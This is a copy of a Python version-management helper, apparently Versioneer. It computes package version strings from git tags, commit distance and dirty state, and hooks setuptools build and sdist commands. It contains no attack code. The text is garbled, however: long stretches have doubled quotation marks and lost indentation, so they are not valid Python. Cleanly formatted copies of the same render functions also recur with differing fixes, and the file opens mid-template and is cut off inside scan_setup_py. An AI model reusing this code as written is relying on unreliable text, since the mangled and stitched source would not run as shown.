The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""])
else:
# exception #1
rendered = pieces[""short""]
if pieces[""dirty""]:
rendered += ""-dirty""
return rendered
def add_one_to_version(version_string, number_index_to_increment=-1):
""""""
Add one to a version string at the given numeric indices.
>>> add_one_to_version('v1.2.3')
'v1.2.4'
""""""
# Break up the tag by number groups (preserving multi-digit
# numbers as multidigit)
parts = re.split(""([0-9]+)"", version_string)
digit_parts = [(i, part) for i, part in enumerate(parts)
if part.isdigit()]
# Deal with negative indexing.
increment_at_index = ((number_index_to_increment + len(digit_parts))
%% len(digit_parts))
for n_seen, (i, part) in enumerate(digit_parts):
if n_seen == increment_at_index:
parts[i] = str(int(part) + 1)
elif n_seen > increment_at_index:
parts[i] = '0'
return ''.join(parts)
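# A further doctest-style example (illustrative): incrementing an earlier
# field zeroes out the fields after it:
# >>> add_one_to_version('v1.2.3', number_index_to_increment=-2)
# 'v1.3.0'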
def render_pep440_branch_based(pieces):
# [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is
# included for dirty.
# exceptions:
# 1: no tags. 0.0.0.devDISTANCE[+gHEX]
replacements = {' ': '.', '(': '', ')': ''}
# sanitize the branch name so it is legal inside a PEP440 local segment
branch_name = pieces.get('branch') or ''
for old, new in replacements.items():
branch_name = branch_name.replace(old, new)
master = branch_name == 'master'
maint = re.match(default_maint_branch_regexp,
branch_name or '')
# If we are on a tag, just pep440-pre it.
if pieces[""closest-tag""] and not (pieces[""distance""] or
pieces[""dirty""]):
rendered = pieces[""closest-tag""]
else:
# Put a default closest-tag in.
if not pieces[""closest-tag""]:
pieces[""closest-tag""] = '0.0.0'
if pieces[""distance""] or pieces[""dirty""]:
if maint:
rendered = pieces[""closest-tag""]
if pieces[""distance""]:
rendered += "".post%%d"" %% pieces[""distance""]
else:
rendered = add_one_to_version(pieces[""closest-tag""])
if pieces[""distance""]:
rendered += "".dev%%d"" %% pieces[""distance""]
suffix = []
# Put the branch name in if it isn't master nor a
# maintenance branch.
if not (master or maint):
suffix.append('%%s' %% (branch_name or 'unknown_branch'))
if pieces[""dirty""]:
suffix.append('g%%s' %% pieces[""short""])
rendered += '+%%s' %% ''.join(suffix)
else:
rendered = pieces[""closest-tag""]
return rendered
STYLES = {'default': render_pep440,
'pep440': render_pep440,
'pep440-pre': render_pep440_pre,
'pep440-post': render_pep440_post,
'pep440-old': render_pep440_old,
'git-describe': render_git_describe,
'git-describe-long': render_git_describe_long,
'pep440-branch-based': render_pep440_branch_based,
}
def render(pieces, style):
""""""Render the given version pieces into the requested style.""""""
if pieces[""error""]:
return {""version"": ""unknown"",
""full-revisionid"": pieces.get(""long""),
""dirty"": None,
""error"": pieces[""error""]}
if not style:
style = 'default'
renderer = STYLES.get(style)
if not renderer:
raise ValueError(""unknown style '%%s'"" %% style)
rendered = renderer(pieces)
return {""version"": rendered, ""full-revisionid"": pieces[""long""],
""dirty"": pieces[""dirty""], ""error"": None}
def get_versions():
""""""Get version information or return default if unable to do so.""""""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {""version"": ""0+unknown"", ""full-revisionid"": None,
""dirty"": None,
""error"": ""unable to find root of source tree""}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {""version"": ""0+unknown"", ""full-revisionid"": None,
""dirty"": None,
""error"": ""unable to compute version""}
'''
@register_vcs_handler(""git"", ""get_keywords"")
def git_get_keywords(versionfile_abs):
""""""Extract version information from the given file.""""""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, ""r"")
for line in f.readlines():
if line.strip().startswith(""git_refnames =""):
mo = re.search(r'=\s*""(.*)""', line)
if mo:
keywords[""refnames""] = mo.group(1)
if line.strip().startswith(""git_full =""):
mo = re.search(r'=\s*""(.*)""', line)
if mo:
keywords[""full""] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler(""git"", ""keywords"")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
""""""Get version information from git keywords.""""""
if not keywords:
raise NotThisMethod(""no keywords at all, weird"")
refnames = keywords[""refnames""].strip()
if refnames.startswith(""$Format""):
if verbose:
print(""keywords are unexpanded, not using"")
raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"")
refs = [r.strip() for r in refnames.strip(""()"").split("","")]
# starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of
# just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those.
TAG = ""tag: ""
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like ""release"" and
# ""stabilization"", as well as ""HEAD"" and ""master"".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print(""discarding '%s', no digits"" % "","".join(set(refs) - tags))
if verbose:
print(""likely tags: %s"" % "","".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. ""2.0"" over ""2.0rc1""
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print(""picking %s"" % r)
return {""version"": r,
""full-revisionid"": keywords[""full""].strip(),
""dirty"": False, ""error"": None, ""branch"": None
}
# no suitable tags, so version is ""0+unknown"", but full hex is still there
if verbose:
print(""no suitable tags, using unknown + full revision id"")
return {""version"": ""0+unknown"",
""full-revisionid"": keywords[""full""].strip(),
""dirty"": False, ""error"": ""no suitable tags"",
""branch"": None}
@register_vcs_handler(""git"", ""pieces_from_vcs"")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
""""""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
""""""
if not os.path.exists(os.path.join(root, "".git"")):
if verbose:
print(""no .git in %s"" % root)
raise NotThisMethod(""no .git directory"")
GITS = [""git""]
if sys.platform == ""win32"":
GITS = [""git.cmd"", ""git.exe""]
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM). Note, for git v1.7
# and below, it is necessary to run ""git update-index --refresh"" first.
describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"",
""--always"", ""--long"",
""--match"", ""%s*"" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod(""'git describe' failed"")
describe_out = describe_out.strip()
full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root)
if full_out is None:
raise NotThisMethod(""'git rev-parse' failed"")
full_out = full_out.strip()
pieces = {}
pieces[""long""] = full_out
pieces[""short""] = full_out[:7] # maybe improved later
pieces[""error""] = None
# abbrev-ref available with git >= 1.7
branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""],
cwd=root).strip()
if branch_name == 'HEAD':
branches = run_command(GITS, [""branch"", ""--contains""],
cwd=root).split('\n')
branches = [branch[2:] for branch in branches if branch[4:5] != '(']
if 'master' in branches:
branch_name = 'master'
elif not branches:
branch_name = None
else:
# Pick the first branch that is returned. Good or bad.
branch_name = branches[0]
pieces['branch'] = branch_name
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith(""-dirty"")
pieces[""dirty""] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex(""-dirty"")]
# now we have TAG-NUM-gHEX or HEX
if ""-"" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces[""error""] = (""unable to parse git-describe output: '%s'""
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = ""tag '%s' doesn't start with prefix '%s'""
print(fmt % (full_tag, tag_prefix))
pieces[""error""] = (""tag '%s' doesn't start with prefix '%s'""
% (full_tag, tag_prefix))
return pieces
pieces[""closest-tag""] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces[""distance""] = int(mo.group(2))
# commit: short hex revision ID
pieces[""short""] = mo.group(3)
else:
# HEX: no tags
pieces[""closest-tag""] = None
count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""],
cwd=root)
pieces[""distance""] = int(count_out) # total number of commits
return pieces
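# Example (sketch): a checkout that ""git describe"" reports as
# ""v1.2-4-gdeadbee-dirty"" with tag_prefix=""v"" produces pieces with
# closest-tag ""1.2"", distance 4, short ""deadbee"" and dirty True.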
def do_vcs_install(manifest_in, versionfile_source, ipy):
""""""Git-specific installation logic for Versioneer.
For Git, this means creating/changing .gitattributes to mark _version.py
for export-time keyword substitution.
""""""
GITS = [""git""]
if sys.platform == ""win32"":
GITS = [""git.cmd"", ""git.exe""]
files = [manifest_in, versionfile_source]
if ipy:
files.append(ipy)
try:
me = __file__
if me.endswith("".pyc"") or me.endswith("".pyo""):
me = os.path.splitext(me)[0] + "".py""
versioneer_file = os.path.relpath(me)
except NameError:
versioneer_file = ""versioneer.py""
files.append(versioneer_file)
present = False
try:
f = open("".gitattributes"", ""r"")
for line in f.readlines():
if line.strip().startswith(versionfile_source):
if ""export-subst"" in line.strip().split()[1:]:
present = True
f.close()
except EnvironmentError:
pass
if not present:
f = open("".gitattributes"", ""a+"")
f.write(""%s export-subst\n"" % versionfile_source)
f.close()
files.append("".gitattributes"")
run_command(GITS, [""add"", ""--""] + files)
def versions_from_parentdir(parentdir_prefix, root, verbose):
""""""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes
both the project name and a version string.
""""""
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print(""guessing rootdir is '%s', but '%s' doesn't start with ""
""prefix '%s'"" % (root, dirname, parentdir_prefix))
raise NotThisMethod(""rootdir doesn't start with parentdir_prefix"")
return {""version"": dirname[len(parentdir_prefix):],
""full-revisionid"": None,
""dirty"": False, ""error"": None}
SHORT_VERSION_PY = """"""
# This file was generated by 'versioneer.py' (0.15+dev) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json
import sys
version_json = '''
%s
''' # END VERSION_JSON
def get_versions():
return json.loads(version_json)
""""""
def versions_from_file(filename):
""""""Try to determine the version from _version.py if present.""""""
try:
with open(filename) as f:
contents = f.read()
except EnvironmentError:
raise NotThisMethod(""unable to read _version.py"")
mo = re.search(r""version_json = '''\n(.*)''' # END VERSION_JSON"",
contents, re.M | re.S)
if not mo:
raise NotThisMethod(""no version_json in _version.py"")
return json.loads(mo.group(1))
def write_to_version_file(filename, versions):
""""""Write the given version number to the given _version.py file.""""""
os.unlink(filename)
contents = json.dumps(versions, sort_keys=True,
indent=1, separators=("","", "": ""))
with open(filename, ""w"") as f:
f.write(SHORT_VERSION_PY % contents)
print(""set %s to '%s'"" % (filename, versions[""version""]))
# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc.
default_maint_branch_regexp = r".*([0-9]+\.)+x$"


def plus_or_dot(pieces):
    """Return a + if we don't already have one, else return a ."""
    # "closest-tag" may be present but None; guard against that before
    # testing membership.
    if "+" in (pieces.get("closest-tag") or ""):
        return "."
    return "+"
def render_pep440(pieces):
    """Build up version string, with post-release "local version identifier".

    Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
    get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty

    Exceptions:
    1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"] or pieces["dirty"]:
            rendered += plus_or_dot(pieces)
            rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
            if pieces["dirty"]:
                rendered += ".dirty"
    else:
        # exception #1
        rendered = "0+untagged.%d.g%s" % (pieces["distance"],
                                          pieces["short"])
        if pieces["dirty"]:
            rendered += ".dirty"
    return rendered
def render_pep440_pre(pieces):
    """TAG[.post.devDISTANCE] -- No -dirty.

    Exceptions:
    1: no tags. 0.post.devDISTANCE
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"]:
            rendered += ".post.dev%d" % pieces["distance"]
    else:
        # exception #1
        rendered = "0.post.dev%d" % pieces["distance"]
    return rendered
def render_pep440_post(pieces):
    """TAG[.postDISTANCE[.dev0]+gHEX] .

    The ".dev0" means dirty. Note that .dev0 sorts backwards
    (a dirty tree will appear "older" than the corresponding clean one),
    but you shouldn't be releasing software with -dirty anyways.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"] or pieces["dirty"]:
            rendered += ".post%d" % pieces["distance"]
            if pieces["dirty"]:
                rendered += ".dev0"
            rendered += plus_or_dot(pieces)
            rendered += "g%s" % pieces["short"]
    else:
        # exception #1
        rendered = "0.post%d" % pieces["distance"]
        if pieces["dirty"]:
            rendered += ".dev0"
        rendered += "+g%s" % pieces["short"]
    return rendered
def render_pep440_old(pieces):
    """TAG[.postDISTANCE[.dev0]] .

    The ".dev0" means dirty.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"] or pieces["dirty"]:
            rendered += ".post%d" % pieces["distance"]
            if pieces["dirty"]:
                rendered += ".dev0"
    else:
        # exception #1
        rendered = "0.post%d" % pieces["distance"]
        if pieces["dirty"]:
            rendered += ".dev0"
    return rendered
def render_git_describe(pieces):
    """TAG[-DISTANCE-gHEX][-dirty].

    Like 'git describe --tags --dirty --always'.

    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"]:
            rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
    else:
        # exception #1
        rendered = pieces["short"]
    if pieces["dirty"]:
        rendered += "-dirty"
    return rendered
def render_git_describe_long(pieces):
    """TAG-DISTANCE-gHEX[-dirty].

    Like 'git describe --tags --dirty --always --long'.
    The distance/hash is unconditional.

    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
    else:
        # exception #1
        rendered = pieces["short"]
    if pieces["dirty"]:
        rendered += "-dirty"
    return rendered
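
# Illustrative examples (a sketch; the tag and hex values are made up):
# given one sample "pieces" dict, the render_* styles above produce:
#
#   pieces = {"closest-tag": "1.2", "distance": 3, "short": "abc1234",
#             "dirty": True, "long": "", "error": None}
#   render_pep440(pieces)            -> '1.2+3.gabc1234.dirty'
#   render_pep440_pre(pieces)        -> '1.2.post.dev3'
#   render_pep440_post(pieces)       -> '1.2.post3.dev0+gabc1234'
#   render_pep440_old(pieces)        -> '1.2.post3.dev0'
#   render_git_describe(pieces)      -> '1.2-3-gabc1234-dirty'
#   render_git_describe_long(pieces) -> '1.2-3-gabc1234-dirty'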
def add_one_to_version(version_string, number_index_to_increment=-1):
    """
    Add one to a version string at the given numeric index.

    >>> add_one_to_version('v1.2.3')
    'v1.2.4'
    """
    # Break up the tag by number groups (preserving multi-digit
    # numbers as multidigit)
    parts = re.split("([0-9]+)", version_string)

    digit_parts = [(i, part) for i, part in enumerate(parts)
                   if part.isdigit()]

    # Deal with negative indexing.
    increment_at_index = ((number_index_to_increment + len(digit_parts))
                          % len(digit_parts))
    for n_seen, (i, part) in enumerate(digit_parts):
        if n_seen == increment_at_index:
            parts[i] = str(int(part) + 1)
        elif n_seen > increment_at_index:
            parts[i] = '0'
    return ''.join(parts)
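
# Illustrative examples (a sketch): the index picks which number group to
# bump, counting from the left; groups after it reset to zero, and negative
# indices count from the right:
#
#   add_one_to_version('v1.2.3')     -> 'v1.2.4'   (default: last group)
#   add_one_to_version('v1.2.3', 1)  -> 'v1.3.0'
#   add_one_to_version('v1.2.3', 0)  -> 'v2.0.0'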
def render_pep440_branch_based(pieces):
    # [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is
    # included for dirty.
    # exceptions:
    # 1: no tags. 0.0.0.devDISTANCE[+gHEX]
    replacements = {' ': '.', '(': '', ')': ''}
    # Guard against a missing branch name (e.g. a detached HEAD).
    branch_name = pieces.get('branch') or ''
    for old, new in replacements.items():
        branch_name = branch_name.replace(old, new)
    master = branch_name == 'master'
    maint = re.match(default_maint_branch_regexp, branch_name)

    # If we are on a tag, just pep440-pre it.
    if pieces["closest-tag"] and not (pieces["distance"] or
                                      pieces["dirty"]):
        rendered = pieces["closest-tag"]
    else:
        # Put a default closest-tag in.
        if not pieces["closest-tag"]:
            pieces["closest-tag"] = '0.0.0'

        if pieces["distance"] or pieces["dirty"]:
            if maint:
                rendered = pieces["closest-tag"]
                if pieces["distance"]:
                    rendered += ".post%d" % pieces["distance"]
            else:
                rendered = add_one_to_version(pieces["closest-tag"])
                if pieces["distance"]:
                    rendered += ".dev%d" % pieces["distance"]

            suffix = []
            # Put the branch name in if it isn't master nor a
            # maintenance branch.
            if not (master or maint):
                suffix.append('%s' % (branch_name or 'unknown_branch'))
            if pieces["dirty"]:
                suffix.append('g%s' % pieces["short"])
            # Only add the local-version separator when there is a suffix;
            # a bare trailing '+' would not be valid PEP 440.
            if suffix:
                rendered += '+%s' % ''.join(suffix)
        else:
            rendered = pieces["closest-tag"]
    return rendered
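
# Illustrative example (a sketch; branch and values are hypothetical): on a
# feature branch 'widget-work' with closest tag '1.2.3', four commits since
# the tag and a clean tree, the last number group is bumped, the distance
# becomes a .dev suffix, and the branch name lands in the local version:
#
#   pieces = {"closest-tag": "1.2.3", "distance": 4, "short": "abc1234",
#             "dirty": False, "branch": "widget-work"}
#   render_pep440_branch_based(pieces) -> '1.2.4.dev4+widget-work'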
STYLES = {'default': render_pep440,
          'pep440': render_pep440,
          'pep440-pre': render_pep440_pre,
          'pep440-post': render_pep440_post,
          'pep440-old': render_pep440_old,
          'git-describe': render_git_describe,
          'git-describe-long': render_git_describe_long,
          'pep440-branch-based': render_pep440_branch_based,
          }
def render(pieces, style):
    """Render the given version pieces into the requested style."""
    if pieces["error"]:
        return {"version": "unknown",
                "full-revisionid": pieces.get("long"),
                "dirty": None,
                "error": pieces["error"]}

    if not style:
        style = 'default'
    renderer = STYLES.get(style)
    if not renderer:
        raise ValueError("unknown style '%s'" % style)

    rendered = renderer(pieces)
    return {"version": rendered, "full-revisionid": pieces["long"],
            "dirty": pieces["dirty"], "error": None}
class VersioneerBadRootError(Exception):
    """The project root directory is unknown or missing key files."""
def get_versions(verbose=False):
    """Get the project version from whatever source is available.

    Returns dict with two keys: 'version' and 'full'.
    """
    if "versioneer" in sys.modules:
        # see the discussion in cmdclass.py:get_cmdclass()
        del sys.modules["versioneer"]

    root = get_root()
    cfg = get_config_from_root(root)

    assert cfg.VCS is not None, "please set [versioneer]VCS= in setup.cfg"
    handlers = HANDLERS.get(cfg.VCS)
    assert handlers, "unrecognized VCS '%s'" % cfg.VCS
    verbose = verbose or cfg.verbose
    assert cfg.versionfile_source is not None, \
        "please set versioneer.versionfile_source"
    assert cfg.tag_prefix is not None, "please set versioneer.tag_prefix"

    versionfile_abs = os.path.join(root, cfg.versionfile_source)

    # extract version from first of: _version.py, VCS command (e.g. 'git
    # describe'), parentdir. This is meant to work for developers using a
    # source checkout, for users of a tarball created by 'setup.py sdist',
    # and for users of a tarball/zipball created by 'git archive' or github's
    # download-from-tag feature or the equivalent in other VCSes.

    get_keywords_f = handlers.get("get_keywords")
    from_keywords_f = handlers.get("keywords")
    if get_keywords_f and from_keywords_f:
        try:
            keywords = get_keywords_f(versionfile_abs)
            ver = from_keywords_f(keywords, cfg.tag_prefix, verbose)
            if verbose:
                print("got version from expanded keyword %s" % ver)
            return ver
        except NotThisMethod:
            pass

    try:
        ver = versions_from_file(versionfile_abs)
        if verbose:
            print("got version from file %s %s" % (versionfile_abs, ver))
        return ver
    except NotThisMethod:
        pass

    from_vcs_f = handlers.get("pieces_from_vcs")
    if from_vcs_f:
        try:
            pieces = from_vcs_f(cfg.tag_prefix, root, verbose)
            ver = render(pieces, cfg.style)
            if verbose:
                print("got version from VCS %s" % ver)
            return ver
        except NotThisMethod:
            pass

    try:
        if cfg.parentdir_prefix:
            ver = versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
            if verbose:
                print("got version from parentdir %s" % ver)
            return ver
    except NotThisMethod:
        pass

    if verbose:
        print("unable to compute version")

    return {"version": "0+unknown", "full-revisionid": None,
            "dirty": None, "error": "unable to compute version"}


def get_version():
    """Get the short version string for this project."""
    return get_versions()["version"]
def get_cmdclass():
""""""Get the custom setuptools/distutils subclasses used by Versioneer.""""""
if ""versioneer"" in sys.modules:
del sys.modules[""versioneer""]
# this fixes the ""python setup.py develop"" case (also 'install' and
# 'easy_install .'), in which subdependencies of the main project are
# built (using setup.py bdist_egg) in the same python process. Assume
# a main project A and a dependency B, which use different versions
# of Versioneer. A's setup.py imports A's Versioneer, leaving it in
# sys.modules by the time B's setup.py is executed, causing B to run
# with the wrong versioneer. Setuptools wraps the sub-dep builds in a
    # sandbox that restores sys.modules to its pre-build state, so the
# parent is protected against the child's ""import versioneer"". By
# removing ourselves from sys.modules here, before the child build
# happens, we protect the child from the parent's versioneer too.
# Also see https://github.com/warner/python-versioneer/issues/52
cmds = {}
# we add ""version"" to both distutils and setuptools
from distutils.core import Command
class cmd_version(Command):
description = ""report generated version string""
user_options = []
boolean_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
vers = get_versions(verbose=True)
print(""Version: %s"" % vers[""version""])
print("" full-revisionid: %s"" % vers.get(""full-revisionid""))
print("" dirty: %s"" % vers.get(""dirty""))
if vers[""error""]:
print("" error: %s"" % vers[""error""])
cmds[""version""] = cmd_version
# we override ""build_py"" in both distutils and setuptools
#
# most invocation pathways end up running build_py:
# distutils/build -> build_py
# distutils/install -> distutils/build ->..
# setuptools/bdist_wheel -> distutils/install ->..
# setuptools/bdist_egg -> distutils/install_lib -> build_py
# setuptools/install -> bdist_egg ->..
# setuptools/develop -> ?
# we override different ""build_py"" commands for both environments
if ""setuptools"" in sys.modules:
from setuptools.command.build_py import build_py as _build_py
else:
from distutils.command.build_py import build_py as _build_py
class cmd_build_py(_build_py):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
_build_py.run(self)
# now locate _version.py in the new build/ directory and replace
# it with an updated value
if cfg.versionfile_build:
target_versionfile = os.path.join(self.build_lib,
cfg.versionfile_build)
print(""UPDATING %s"" % target_versionfile)
write_to_version_file(target_versionfile, versions)
cmds[""build_py""] = cmd_build_py
if ""cx_Freeze"" in sys.modules: # cx_freeze enabled?
from cx_Freeze.dist import build_exe as _build_exe
class cmd_build_exe(_build_exe):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
target_versionfile = cfg.versionfile_source
print(""UPDATING %s"" % target_versionfile)
write_to_version_file(target_versionfile, versions)
_build_exe.run(self)
os.unlink(target_versionfile)
with open(cfg.versionfile_source, ""w"") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG %
{""DOLLAR"": ""$"",
""STYLE"": cfg.style,
""TAG_PREFIX"": cfg.tag_prefix,
""PARENTDIR_PREFIX"": cfg.parentdir_prefix,
""VERSIONFILE_SOURCE"": cfg.versionfile_source,
})
cmds[""build_exe""] = cmd_build_exe
del cmds[""build_py""]
# we override different ""sdist"" commands for both environments
if ""setuptools"" in sys.modules:
from setuptools.command.sdist import sdist as _sdist
else:
from distutils.command.sdist import sdist as _sdist
class cmd_sdist(_sdist):
def run(self):
versions = get_versions()
self._versioneer_generated_versions = versions
# unless we update this, the command will keep using the old
# version
self.distribution.metadata.version = versions[""version""]
return _sdist.run(self)
def make_release_tree(self, base_dir, files):
root = get_root()
cfg = get_config_from_root(root)
_sdist.make_release_tree(self, base_dir, files)
# now locate _version.py in the new base_dir directory
# (remembering that it may be a hardlink) and replace it with an
# updated value
target_versionfile = os.path.join(base_dir, cfg.versionfile_source)
print(""UPDATING %s"" % target_versionfile)
write_to_version_file(target_versionfile,
self._versioneer_generated_versions)
cmds[""sdist""] = cmd_sdist
return cmds
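
# Illustrative integration (a sketch; mirrors the CONFIG_ERROR text below):
# a project's setup.py wires these commands in with:
#
#   import versioneer
#   setup(version=versioneer.get_version(),
#         cmdclass=versioneer.get_cmdclass(), ...)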
CONFIG_ERROR = """"""
setup.cfg is missing the necessary Versioneer configuration. You need
a section like:
[versioneer]
VCS = git
style = pep440
versionfile_source = src/myproject/_version.py
versionfile_build = myproject/_version.py
tag_prefix =
parentdir_prefix = myproject-
You will also need to edit your setup.py to use the results:
import versioneer
setup(version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(), ...)
Please read the docstring in ./versioneer.py for configuration instructions,
edit setup.cfg, and re-run the installer or 'python versioneer.py setup'.
""""""
SAMPLE_CONFIG = """"""
# See the docstring in versioneer.py for instructions. Note that you must
# re-run 'versioneer.py setup' after changing this section, and commit the
# resulting files.
[versioneer]
#VCS = git
#style = pep440
#versionfile_source =
#versionfile_build =
#tag_prefix =
#parentdir_prefix =
""""""
INIT_PY_SNIPPET = """"""
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
""""""
def do_setup():
""""""Main VCS-independent setup function for installing Versioneer.""""""
root = get_root()
try:
cfg = get_config_from_root(root)
except (EnvironmentError, configparser.NoSectionError,
configparser.NoOptionError) as e:
if isinstance(e, (EnvironmentError, configparser.NoSectionError)):
print(""Adding sample versioneer config to setup.cfg"",
file=sys.stderr)
with open(os.path.join(root, ""setup.cfg""), ""a"") as f:
f.write(SAMPLE_CONFIG)
print(CONFIG_ERROR, file=sys.stderr)
return 1
print("" creating %s"" % cfg.versionfile_source)
with open(cfg.versionfile_source, ""w"") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG % {""DOLLAR"": ""$"",
""STYLE"": cfg.style,
""TAG_PREFIX"": cfg.tag_prefix,
""PARENTDIR_PREFIX"": cfg.parentdir_prefix,
""VERSIONFILE_SOURCE"": cfg.versionfile_source,
})
ipy = os.path.join(os.path.dirname(cfg.versionfile_source),
""__init__.py"")
if os.path.exists(ipy):
try:
with open(ipy, ""r"") as f:
old = f.read()
except EnvironmentError:
old = """"
if INIT_PY_SNIPPET not in old:
print("" appending to %s"" % ipy)
with open(ipy, ""a"") as f:
f.write(INIT_PY_SNIPPET)
else:
print("" %s unmodified"" % ipy)
else:
print("" %s doesn't exist, ok"" % ipy)
ipy = None
# Make sure both the top-level ""versioneer.py"" and versionfile_source
# (PKG/_version.py, used by runtime code) are in MANIFEST.in, so
# they'll be copied into source distributions. Pip won't be able to
# install the package without this.
manifest_in = os.path.join(root, ""MANIFEST.in"")
simple_includes = set()
try:
with open(manifest_in, ""r"") as f:
for line in f:
if line.startswith(""include ""):
for include in line.split()[1:]:
simple_includes.add(include)
except EnvironmentError:
pass
# That doesn't cover everything MANIFEST.in can do
# (http://docs.python.org/2/distutils/sourcedist.html#commands), so
# it might give some false negatives. Appending redundant 'include'
# lines is safe, though.
if ""versioneer.py"" not in simple_includes:
print("" appending 'versioneer.py' to MANIFEST.in"")
with open(manifest_in, ""a"") as f:
f.write(""include versioneer.py\n"")
else:
print("" 'versioneer.py' already in MANIFEST.in"")
if cfg.versionfile_source not in simple_includes:
print("" appending versionfile_source ('%s') to MANIFEST.in"" %
cfg.versionfile_source)
with open(manifest_in, ""a"") as f:
f.write(""include %s\n"" % cfg.versionfile_source)
else:
print("" versionfile_source already in MANIFEST.in"")
# Make VCS-specific changes. For git, this means creating/changing
# .gitattributes to mark _version.py for export-time keyword
# substitution.
do_vcs_install(manifest_in, cfg.versionfile_source, ipy)
return 0
def scan_setup_py():
""""""Validate the contents of setup.py against Versioneer's expectations.""""""
found = set()
setters = False
errors = 0
with open(""setup.py"", ""r"") as f:
for line in f.readlines():
if ""import versioneer"" in line:
found.add(""import"")
if ""versioneer.get_cmdclass()"" in line:
found.add(""cmdclass"")
if ""versioneer.get_version()"" in line:
found.add(""get_version"")
if ""versioneer.VCS"" in line:
setters = True
if ""versioneer.versionfile_source"" in line:
setters = True
if len(found) != 3:
print("""")
print(""Your setup.py appears to be missing some important items"")
print(""(but I might be wrong). Please make sure it has something"")
print(""roughly like the following:"")
print("""")
print("" import versioneer"")
print("" setup( version=versioneer.get_version(),"")
print("" cmdclass=versioneer.get_cmdclass(), ...)"")
